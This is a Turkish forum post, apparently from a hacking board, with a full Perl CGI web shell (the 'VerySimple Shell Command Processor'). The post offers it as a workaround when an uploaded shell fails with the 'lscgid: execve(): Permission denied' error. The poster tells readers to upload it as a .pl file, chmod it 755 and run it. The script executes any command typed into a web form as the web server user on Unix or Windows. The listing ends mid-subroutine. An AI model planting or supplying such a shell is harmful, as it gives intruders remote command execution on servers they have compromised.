lscgid: execve(): Permission denied Bypass Perl

bazen bole hatalar alırısnız shell atarken perl denerken altta verdiğim sheli pl uzantılı olarak kaydedeip atın ve chomudunu 755 yapın çalıştırın çoğu yerde işe yarayacaktır




Kod:

#!/usr/bin/perl -w
# ----------------------------------------------------------------------------
# Shell.pl v 1.3 Modified 11/10/00
# Copyright (c) 2000 Jason M. Hinkle. All rights reserved. This script is
# free software; you may redistribute it and/or modify it under the same
# terms as Perl itself. For information: [Linkleri görebilmek için üye olun veya giriş yapın.]
#
# LEGAL DISCLAIMER: This software is provided as-is. Use it at your own risk.
# The author takes no responsibility for any damages or losses directly or
# indirectly caused by this software.
# ----------------------------------------------------------------------------

# re-route fatal errors
$SIG{__DIE__} = &CommandFailed;
$SIG{__WARN__} = &CommandFailed;

#flush the buffer, require modules and create our objects
$|++;
use CGI;
my ($objFormData) = new CGI;
my ($VERSION) = "1.3";
my ($input) = "";

# check for form input
if (defined($objFormData->param("command"))) {
$input = $objFormData->param("command");
}

# make it look nice
&print_header();
&print_form($input);

# execute the command
if ($objFormData->param) {
&execute_command($input);
}

&print_footer();
exit;

#______________________________________________________________________________
sub print_form {
my ($value) = shift || "";
print "This application executes commands on the server using\n";
print "the permission level of the web server account.\n";
print "See the ReadMe file about using this program on Windows servers.\n";
print "<p>\n";
print "<form action='" . &CurrentUrl . "' method='post'>\n";
print "<b>Shell Command:</b><br>\n";
print "<input type='text' name='command' size='55' value='" . $value . "'>\n";
print "<input type='submit' value='Execute'>\n";
print "</form>\n";
}

#______________________________________________________________________________
sub print_header {
print "Content-type: text/html\n\n";
print "<html>\n";
print "<head>\n";
print "<title>VerySimple Shell Command Processor</title>\n";
print "</head>\n";
print "<body link='blue' vlink='blue'>\n";
print "<font face='arial,helvetica' size='2'>\n";
print "<table width='100%' bgcolor='\#CDCDCD'><tr><td>\n";
print "<b>VerySimple Shell Command Processor $VERSION</b>\n";
print "</td></tr></table>\n";
print "<p>\n";
}

#______________________________________________________________________________
sub print_footer {
print "<p><hr><font size='1'>\n";
print "VerySimple Shell Command Processor: &copy 2000, <a href='http://www.verysimple.com/'>VerySimple</a><br>\n";
print "A component of the <a href='http://www.verysimple.com/scripts/toolbox.html'>VerySimple Developer Toolbox</a>\n";
print "</font><p>\n";
print "</font>\n";
print "</body>\n";
print "</html>\n";
}

#______________________________________________________________________________
sub execute_command {
my $command = shift || "";

if ($command eq "") {
print "No command submitted\n";
return 0;
}

if (defined($ENV{'PATH_TRANSLATED'})) {
execute_win_command($command);
} else {
execute_unix_command($command);
}
}

#______________________________________________________________________________
sub execute_unix_command {
my $command = shift || "";

# redirect error to stdout
open (STDERR, ">>&STDOUT");

print "<form>\n";
print "<b>Results:</b><br>\n";
print "<textarea name='results' rows='10' cols='80' wrap='off'>\n";
my (@output) = `$command`;
my ($output) = "";
foreach $output (@output) {
print $output;
}
print "</textarea></form>\n";

# attempt to get the username:
@output = `whoami`;
print "Username: " . $output[0] . "<br>\n";
print "Process Id: " . $$ . "<br>\n";
}

#______________________________________________________________________________
sub execute_win_command {
my $command = shift || "";
my ($exitcode) = 0;
my ($wincompath) = $ENV{'COMSPEC'};
my ($wincom) = substr($wincompath,rindex($wincompath,"\") + 1);

# check that we were able to locate the command interpreter
unless (-r $wincompath) {
&CommandFailed("Win32 command interpreter could not be found.");
exit;
}

# use the win32 libraries for windows servers.
eval 'use Win32::Process';
eval 'use Win32';
print "<form>\n";
print "<b>Results:</b><br>\n";
print "<textarea name='results' rows='10' cols='80' wrap='off'>\n";
Win32::Process::Create($ProcessObj,
$wincompath,
$wincom . " /c " . $command,
0,
NORMAL_PRIORITY_CLASS,
".")|| die ErrorReport();
$ProcessObj->Suspend();
$ProcessObj->Resume();
$ProcessObj->Wait(5000);
$ProcessObj->Kill($exitcode);
print "</textarea></form>\n";
print "Username: " . Win32::LoginName() . "<br>\n";
print "Command Interpreter: " . $wincompath . "<br>\n";
print "Process Id: " . $ProcessObj->GetProcessID() . "\n";
}

#______________________________________________________________________________
sub ErrorReport{
print Win32::FormatMessage( Win32::GetLastError() );
}

#______________________________________________________________________________
sub CurrentUrl {
if (defined($ENV{'SCRIPT_NAME'})) {
return $ENV{'SCRIPT_NAME'};
} else {
return $ENV{REQUEST_URI};
}
}

#______________________________________________________________________________
sub CommandFailed {
my ($error) = shift || "Unknown Error";
if (index($error,"NORMAL_PRIORITY_CLASS",1) > 0) {
# ignore this warning from the Win32 module.
} elsif (index($error,"No such file or directory at",1) > 0) {
print "Command not found.";
} else {
print $error;
}